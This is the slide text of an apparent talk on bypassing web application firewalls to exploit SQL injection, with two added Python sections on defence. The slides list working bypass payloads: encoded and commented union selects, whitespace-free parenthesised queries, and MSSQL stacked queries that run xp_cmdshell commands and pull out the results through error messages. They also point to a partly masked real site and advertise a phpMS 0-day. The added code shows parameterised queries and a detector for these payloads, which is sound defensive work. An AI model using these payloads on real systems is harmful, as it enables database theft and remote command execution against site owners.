2. • Got listed on the eBay and Microsoft security researcher lists
• Worked as a freelance security researcher for tech2.in.com and in.com
• Found SQLi vulnerabilities at the Kerala entrance portal website
• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982
• Basically the InfoSec researcher guy
3. Strictly WAF-based and real-life-based scenarios
MSSQL stacked queries (thought it was a good add-on)
A phpMS 0-day
4. First among the OWASP Top 10 vulnerabilities
Used for gaining access to the SQL database and hence the b0x
Mainly of 5 types:
Union based
Error based
XPath based
Blind and time based
Double query based
5. So what's the catch here!!!
Pentesting real-life scenarios is more difficult than ever
SQLi has been patched, and firewalls, IDS and IPS are installed everywhere
Exploiting SQLi has become difficult, and the tools have disappointed too!
6. Of course, failure of sqlmap!!!
Failure of Havij, which by the way is always a failure :p
IDS, IPS and the rest of the firewall family
Apache security modules
mod_sec, htmlentities, mysql_escape, magic_quotes and all my dear appsec modules
7. What are they!!?
Well, we need to overcome the situation that has come, rather than sit and lament over it.
Here we will be focusing on the real-life scenarios where the tools fail and much of our human hard work comes in.
8. preg_match is a comparison (regex match) function used in PHP
Mainly deployed by small-scale WAFs
The more poorly coded they are, the easier; an example:
9. Used when "select" + any case letters are blocked:
'select'+'(A-Za-z)'
So any letter after select gets filtered out.
Solution
MySQL has user-defined variables: "@" is a sign that can be used as a prefix, and it denotes stored procedure and function parameter names as well as variable names.
10. So how do we do it?
union select 1,2,3- -  = 403 Forbidden
So it changes to
and (@:=version()) union select 1,@,3- -  = bypassed
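The preg_match blocklist described on the last few slides checks the shape of a string, not what the database will do with it, which is why a rewritten payload slips through. The added example below is not from the slides; it contrasts that blocklist approach (a hypothetical regex, chosen to match the plain "union select" form) with the actual fix, which is validating the id and binding it as a parameter. It uses Python's built-in sqlite3 with a constructed three-column table so that the slides' own "union select 1,2,3" payload lines up.

```python
import re
import sqlite3

# Constructed sample data: a three-column table, so the slides' own
# "union select 1,2,3" payload has the right column count.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(12, "widget", 9.5), (13, "gadget", 19.0)])
    return con

# Hypothetical preg_match-style blocklist of the kind the slides describe:
# it matches the literal shape "union<whitespace>select" and nothing else.
BLOCKLIST = re.compile(r"\bunion\s+select\b", re.I)

def blocklist_blocks(raw_id):
    """True when the WAF regex would answer 403 for this parameter value."""
    return BLOCKLIST.search(raw_id) is not None

def lookup_concatenated(con, raw_id):
    """The vulnerable pattern: the parameter is pasted into the SQL text,
    so the database parses attacker-supplied keywords as SQL."""
    sql = f"SELECT id, name, price FROM products WHERE id = {raw_id}"
    return con.execute(sql).fetchall()

def lookup_parameterised(con, raw_id):
    """The fix: validate the id's shape, then bind it as a value.
    A bound value is never parsed as SQL, whatever characters it contains."""
    if not re.fullmatch(r"\d{1,9}", raw_id):
        return []   # reject anything that is not a plain integer id
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return con.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    con = make_db()
    payload = "-1 union select 1,2,3"
    # The blocklist catches the plain form but not the parenthesised one from the slides.
    print(blocklist_blocks(payload), blocklist_blocks("(2)union(select(1),2,3)"))
    print(lookup_concatenated(con, payload))      # attacker-chosen row comes back
    print(lookup_parameterised(con, payload))     # [] : treated as a bad id, not as SQL
    print(lookup_parameterised(con, "12"))        # the legitimate lookup still works
```

The point for the defender is that no amount of regex tuning makes lookup_concatenated safe, while lookup_parameterised stays correct without any blocklist at all; the WAF is at best a second layer in front of it.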
11. So what's the catch here?
Most of us love the dork inurl:php?id= site:blah.com
So what has happened is that most admins have moved the id= parameter into the URL path, making the tools go reckless and n00bs go mad.
An example: the usual way was site.com/index.php?id= ; now they have gone and changed it to site.com/index-goods-12.html
An example site that has no point of injection at first sight:
Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html
12. (image-only slide)
13. The usual commenting style should be followed here, i.e. the "- -"; otherwise other forms like %23 (#) and /* could cause the statement to be misinterpreted as a comment, commenting out the rest and not letting it read the .html part.
In most cases where these types of injections are encountered there are white spaces, which often cause havoc and a nightmare for scanners.
14. Well, dealing with white spaces depends on the scenario.
You could use the traditional commenting style like
id=3/**/union/**/select 1,2,3
The problem is that /**/ might be filtered in some cases,
so we use parentheses, which is the same as executing the query:
id=(2)union(select(1),2,3)
NB: during HTML-based injections it is better to use the parentheses.
15. Based on Error 1222
Came across CTFs where the answer had to be in normal union-based form.
Most tools fail here since the vulnerable column is being parsed in between the HTML tags.
Usually union statements are provided here, but the columns do not get displayed.
So what do we do?
Please don't say we look over the source, because you're not gonna find anything at the first shot.
16. (image-only slide)
17. We do this by changing the traditional union select 1,2,3 to
union select 1111,2222,3333
This helps us search in the source, but it is still not available on screen.
18. If you would like to display it on screen, you could use the concat or group_concat functions with HTML inside them.
Use the hex of the HTML if quotes are blocked due to magic quotes.
Here we could see the version on closing the "</title>" tag, since the vulnerable column was being displayed within the title block.
19. Bypassing errors 400/403/404/406
//convert(group_concat(schema_name) using ascii) from information_schema.schemata - -
C-style commenting: /*!Union*/+/*!Select*/
// apart from the original source commenting, the ! executes the command
Character encoding: bypasses filters like 400
%55nion/**/%53elect
Sub queries: Union (select 1,2,3)
// where most WAFs fail out
20. id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a
// # is a comment, but the %0A bypasses it with a new line, so the statements get executed
Bypassing Error 1064
Usually related to the blocking of white spaces
id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
// the queries are supplied in parentheses so as to avoid the use of white spaces
"/**/" commenting is also possible
Bypassing Error 500
and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+
// WAFs written in the C language are prone to overflow or act differently when loaded with a bunch of data.
Giving a large amount of data allows our code to execute
21. Stacked queries are mainly available on MSSQL and PostgreSQL servers.
The underlying process is simple: if the xp_cmdshell option is enabled, then you are in.
Stacked query support is checked on the server using 'WAITFOR DELAY hour:min:sec'
For ex: EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or not, depending on the time lag.
24. Just to prove that this still exists: a real-life demo
25. http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--
// Creates the table funkyfresh
http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -
// We declare a variable @funky and store in it the hex equivalent of the command
NOTE: 0x77686f616d69 => 'whoami'
26. /*!AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))
// Credits to Bernardo's original write-up from BlackHat
// The reason I took it: although a bit complicated, it works seamlessly for no reason
Read the temp table to get the results, and you need to make sure you deal with the same data type when you do...
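Every bypass on slides 13 to 20 (URL-encoded keywords, /**/ and /*!...*/ comments, # plus %0A, parentheses instead of spaces) and every stacked-query form on slides 21 to 26 (;DECLARE/EXEC, xp_cmdshell, WAITFOR DELAY, CONVERT(INT,...) error extraction) survives only because the filter matches the raw bytes. The added example below is not from the slides; it is a defender-side normaliser that undoes those obfuscations before matching, so the variants collapse to one plain form. The signature names, the normalisation order and the sample values are my own choices; the sample values are constructed from the payload shapes shown on the slides.

```python
import re
from urllib.parse import unquote_plus

# Signatures are applied to the NORMALISED text, so the encoded, commented
# and parenthesised variants from the slides collapse to one plain form.
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema_enum":   re.compile(r"\binformation_schema\b"),
    "stacked_query": re.compile(r";\s*(?:declare|exec|create|insert|waitfor)\b"),
    "xp_cmdshell":   re.compile(r"\bxp_cmdshell\b"),
    "time_delay":    re.compile(r"\bwaitfor\s+delay\b"),
    "error_convert": re.compile(r"\bconvert\s+int\s*,"),   # parentheses are gone by now
}

def normalise(raw):
    """Undo the obfuscations the slides use before matching."""
    s = unquote_plus(raw)                                    # %55nion -> Union, %0A -> newline, + -> space
    s = re.sub(r"/\*!\s*(.*?)\*/", r" \1 ", s, flags=re.S)   # /*!Union*/ : MySQL executes the body, so keep it
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # /**/ used as a whitespace substitute
    s = re.sub(r"(?:#|--)[^\n]*", " ", s)                    # line comments stop at the newline %0A inserted
    s = re.sub(r"[()]", " ", s)                              # parentheses used instead of spaces
    return re.sub(r"\s+", " ", s).strip().lower()

def classify(raw):
    """Return the names of every signature the normalised parameter matches."""
    text = normalise(raw)
    return [name for name, pat in SIGNATURES.items() if pat.search(text)]

# Constructed samples: parameter values of the shapes shown on the slides, plus benign ones.
SAMPLES = [
    "12",
    "index-goods-12.html",
    "(2)union(select(1),2,3)",
    "%55nion/**/%53elect",
    "/*!Union*/+/*!Select*/",
    "-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a",
    "1; WAITFOR DELAY '0:0:5'--",
    "123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; "
    "INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -",
    "5151=CONVERT(INT,(CHAR(91)+(SELECT TOP 1 data FROM funkyfresh)))",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or "-", "<-", sample)
```

Two caveats a practitioner should keep in mind: unquote_plus decodes one layer, so double-encoded input needs the decode step repeated until the text stops changing, and keyword signatures will flag benign text such as "union station select", which is why this belongs in logging and alerting rather than as a substitute for parameterised queries.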
27. (image-only slide)
28. 0-day by me
phpMS - a free CMS (content management system), designed for rapid development and support of web projects of any complexity.
Features of CMS phpMS:
Easy to install;
Multi-level menus;
Arbitrary arrangement of blocks;
Simple module development;
Access rights